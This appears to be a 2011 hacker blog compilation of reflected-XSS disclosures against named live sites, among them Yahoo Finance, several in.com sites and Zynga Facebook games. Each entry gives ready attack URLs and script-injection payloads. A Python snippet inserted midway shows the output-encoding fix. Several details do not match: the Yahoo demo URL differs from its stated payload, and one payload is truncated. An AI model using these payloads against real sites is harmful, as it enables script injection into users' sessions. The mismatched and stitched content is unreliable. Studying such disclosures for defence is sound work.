Training on XSS for newbies



click here to download the file: XSS_PPT

XSS and URL redirection bugs in Zynga games (Facebook third-party applications)



        _______  ________________ __    _____________
_______ \   _  \ \   _  \______  \  | _/_   \______  \         __  _  __
\_  __ \/  /_\  \/  /_\  \  /    /  |/ /|   |   /    /  ______ \ \/ \/ /
 |  | \/\  \_/   \  \_/   \/    /|    < |   |  /    /  /_____/  \     /
 |__|    \_____  /\_____  /____/ |__|_ \|___| /____/             \/\_/
               \/       \/            \/

VENDOR :  apps.facebook.com****[]***
        1) POKER
        2) Farmville
        3) Vampireville
        4) Fishville 
        5) Cafeworld
        6) Petville
Author: r007k17-w
Email:  n4gb07@gmail.com
DISCLAIMER:
Contents of this is for EDUCATIONAL PURPOSE ONLY....
Author is not responsible for misuse of this.
Snapshots:
   


1) POKER
   http://shadowrootkit.files.wordpress.com/2011/08/zynga_poker.png
   http://shadowrootkit.files.wordpress.com/2011/08/zynga_poker1.png
2) FISHVILLE
   http://shadowrootkit.files.wordpress.com/2011/08/zynga_fishville.png
   http://shadowrootkit.files.wordpress.com/2011/08/zynga_fishville1.png
3) VAMPIREVILLE
   http://shadowrootkit.files.wordpress.com/2011/08/zynga_vampireville.png
4) CAFEWORLD
   http://shadowrootkit.files.wordpress.com/2011/08/zynga_cafeworld.png
5) PETVILLE
   http://shadowrootkit.files.wordpress.com/2011/08/zynga_petville.png

Various Indian Sites Cross Site Scripting



# Exploit Title: *.in.com XSS vulnerability
# Vendor: various
# Date: 6th July, 2011
# Author: r007k17 a.k.a Raghavendra Karthik D
# link: http://shadowrootkit.wordpress.com/
# Google Dork:   © Copyright 2010, Business.in.com
************************************************************

{DEMO} :

http://business.in.com/search.php?searchtext=%22%3E%3Cscript%3Ealert%28/s/%29%3C/script%3E

EXPLOIT: "><script>alert(/s/)</script>

{DEMO} :

http://cricketnext.in.com/search/searchnews.php?search_value=%22%3E%3Cscript%3Ealert%28%2Fs%2F%29%3C%2Fscript%3E

EXPLOIT: "><script>alert(/s/)</script>

{DEMO} :

http://hooked-in.com/waterbodies/search?q=%22%3E%3Cscript%3Ealert%28%2Fr007k17%2F%29%3C%2Fscript%3E

EXPLOIT: "><script>alert(/r007k17/)</script>

Reflected XSS in connect.in.com
Inject the EXPLOIT below into the search field at http://connect.in.com
and observe a pop-up saying r007k17.

{DEMO} :   http://connect.in.com

EXPLOIT: "><script>alert(/r007k17/)</script>

************************************************************
 sp3c14l Thanks to s1d3^effects and my friends@!3.14--
************************************************************
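
Every EXPLOIT string in this post starts with "> because the search term is reflected inside a double-quoted HTML attribute. The block below is an added example, not code from the original post or from the affected sites: it renders a hypothetical search form (the template and function names are assumptions) with and without output encoding and parses the result to show which elements the reflected value creates.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote

# Query-string value copied from the first {DEMO} URL above (percent-encoded).
DEMO_VALUE = "%22%3E%3Cscript%3Ealert%28/s/%29%3C/script%3E"

# Assumed template: the page is not shown in the post, so this form is hypothetical.
TEMPLATE = '<form><input type="text" name="searchtext" value="{}"></form>'


def render_vulnerable(term: str) -> str:
    """Echo the search term into the attribute with no output encoding."""
    return TEMPLATE.format(term)


def render_hardened(term: str) -> str:
    """Encode &, <, > and both quote characters before reflecting the term."""
    return TEMPLATE.format(html.escape(term, quote=True))


class TagAudit(HTMLParser):
    """Collects the elements a parser builds and the input's decoded value."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.tags = []
        self.input_value = None

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "input":
            self.input_value = dict(attrs).get("value")


def audit(page: str) -> TagAudit:
    parser = TagAudit()
    parser.feed(page)
    parser.close()
    return parser


if __name__ == "__main__":
    term = unquote(DEMO_VALUE)
    for name, render in (("vulnerable", render_vulnerable), ("hardened", render_hardened)):
        result = audit(render(term))
        print(f"{name:10} elements={result.tags} value={result.input_value!r}")
```

In the hardened rendering the parser sees only the form and input elements, and the input's decoded value is the original search term, so encoding at output time does not change what the user searched for.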

Yahoo Finance (Alexa 4th ranked) cross-site scripting vulnerability



Yahoo Finance, a well-known site ranked 4th by Alexa, had an XSS vulnerability
in the GET QUOTES search field.

%+         $…….#……..4………|)……..0…………\/\/       %+
%+                                                %+
%++++++++++++++++++++++++++++++++++++++++
#Exploit Title :Yahoo finance reflected XSS vulnerability
# Vendor: www.finance.yahoo.com
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D(karthikaryabhat@gmail.com)
# Google Dork: Copyright © 2011 Yahoo! Inc
**********************************************************************************************************
BRIEF DESCRIPTION
***********************************************************************************************************
Reflected XSS in Yahoo Finance in the text field beside the [GET QUOTES] button.
**********************************************************************************************************
Reflected XSS Vulnerability
**********************************************************************************************************
{DEMO} : target/q?s=%22%3E%3E%3Cb%3E%3Ch1%3Eaa%3C%2Fh1%3E%3C/b%3E&ql=1
EXPLOIT: ">><marquee><h1>yahoo japan</marquee>
Procedure: Open the link given above. Observe the text field with a button (GET QUOTES). Inject the above "EXPLOIT" into this text field.
You can observe an iframe created and a pop-up.
***********************************************************************************************************
sp3c14l Thanks to s1d3 effects and my friends@!3.14--
***********************************************************************************************************
Reference: http://www.xssed.com/mirror/73490/

Classifieddemo site XSS vulnerability



%+ $…….#……..4………|)……..0…………\/\/ %+

%+ %+ %++++++++++++++++++++++++++++++++++++++++

# Exploit Title: Classifieddemo site XSS vulnerability
# Vendor: http://www.classifieddemo.com
# Date: 4th July, 2011
# Author: $#4d0\/\/[r007k17] a.k.a Raghavendra Karthik D
# Google Dork: Copyright © 2011 Classified website

**********************************************************************************************************
BRIEF DESCRIPTION
**********************************************************************************************************
Reflected XSS in the search field of the Classifieddemo site.
**********************************************************************************************************
XSS Vulnerability
**********************************************************************************************************
{DEMO} : http://www.classifieddemo.com/c-BrowseClassified/q:%5C%22%3E%3Cmarquee%3E%3Ch1%3EXSSed%20By%20r007k17%3C/h1%3E%3C/marquee%3E|p:0|gal:0|typ:|/
EXPLOIT: ">XSSed By r007k17
**********************************************************************************************************
sp3c14l Thanks to s1d3 effects and my friends@!3.14--
**********************************************************************************************************
